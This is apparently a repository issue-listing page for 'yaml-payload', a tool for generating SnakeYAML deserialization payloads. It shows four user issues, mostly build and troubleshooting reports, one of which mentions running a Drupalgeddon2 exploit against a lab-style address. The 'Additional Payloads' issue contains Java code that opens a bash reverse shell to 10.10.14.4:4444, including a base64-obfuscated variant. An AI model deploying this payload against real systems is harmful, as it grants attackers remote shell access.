yaml-payload icon indicating copy to clipboard operation
yaml-payload copied to clipboard

Published 20 hours ago verified publisher icon artsploit

Metadata

A tiny project for generating SnakeYAML deserialization payloads

Results 4 yaml-payload issues
Sort by recently updated
recently updated
newest added

Cannot load such file -- highline/import (LoadError)

kali@kali:~/Drupalgeddon2$ ruby drupalgeddon2.rb http://10.10.10.233 Traceback (most recent call last): 2: from drupalgeddon2.rb:16:in `' 1: from /usr/lib/ruby/vendor_ruby/rubygems/core_ext/kernel_require.rb:85:in `require' /usr/lib/ruby/vendor_ruby/rubygems/core_ext/kernel_require.rb:85:in `require': cannot load such file -- highline/import (LoadError)

K4IdO avatar K4IdO

Additional Payloads

**Additional Examples of Payloads**: yaml-payload/src/artsploit/AwesomeScriptEngineFactory.java ``` public AwesomeScriptEngineFactory() { String [] cmd={"bash","-c","bash -i >& /dev/tcp/10.10.14.4/4444 0>&1"}; String [] jex={"bash","-c","{echo,$(echo -n $cmd | base64)}|{base64,-d}|{bash,-i}"}; try { Runtime.getRuntime().exec(cmd); Runtime.getRuntime().exec(jex); Runtime.getRuntime().exec("echo $jex"); }...

ghost avatar ghost

Can't construct a java object for tag:yaml.org,2002:java.net.URL

Running with Spring Boot (v2.2.1.RELEASE), this technique seems to fail at the Snakeyaml invocation when attempted to pass a string to java.net.URL (at least on my machine with a test...

ctshanghai avatar ctshanghai

Demo used a deprecated Java version to build executable that no longer works with modern Java versions

Just to add a note. If you follow the steps from the main page it will build the file using more modern Java versions. If you try to execute it...

gunzf0x avatar gunzf0x

Metadata

353
Stars
91
Forks
Watchers

Owner

verified publisher icon artsploit

Metadata

A tiny project for generating SnakeYAML deserialization payloads

Back